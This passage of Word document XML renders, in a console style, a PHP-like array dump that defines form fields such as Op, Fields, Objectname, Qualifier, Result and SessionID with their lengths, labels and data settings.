              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CEAE0A4" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19B8BC69" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          'Op' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F20D0E6"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8FAEFB5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Op',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DCAB8AA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="051B174C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B59614C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 35,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EF6A4A2" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Operation',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4716B6CA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D6F385A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'list',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ED1ADC9" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D04D0BD" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CC89889" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">          'Fields' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06908A41"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21481DA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Fields',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17C688C6" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3679E215" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CE30469" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C2D269C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Fields',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B2EE8E4" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31A951D7" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '*',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47B564DF" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14EB8898" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AE3F0EF" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Objectname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059EBFC5"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362F8BDC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Objectname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59153F9A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F35D821" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FB13404" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 35,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C2568F9" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Objectname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42390B79" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2179F3E8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E8EC1AD" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25A9051B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6035AEEE" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          'Qualifier' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0684BD4D"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D5EE879" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Qualifier',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D0937F5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55B48F37" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AE70953" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 35,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C5D6E8C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Qualifier',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0766CFF2" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E443DA6" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AFDCEC3" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25F1F74B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EA8B3D0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          'Result' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39071BEA"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0C6A251" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Result',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F4DF41D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C9ACB96" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4981052B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75B02DFE" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Response',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02E14E48" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1884CDF1" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39DD495B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7953F861" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="256C96A7" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SessionID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51DC506B"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C060B37" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SessionID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EE8F77F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A6BBE05" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02659B77" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 60,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F09C8F3" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Session ID',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="056EC5E9" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05AB2589" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11CB9A7E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AF27D35" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
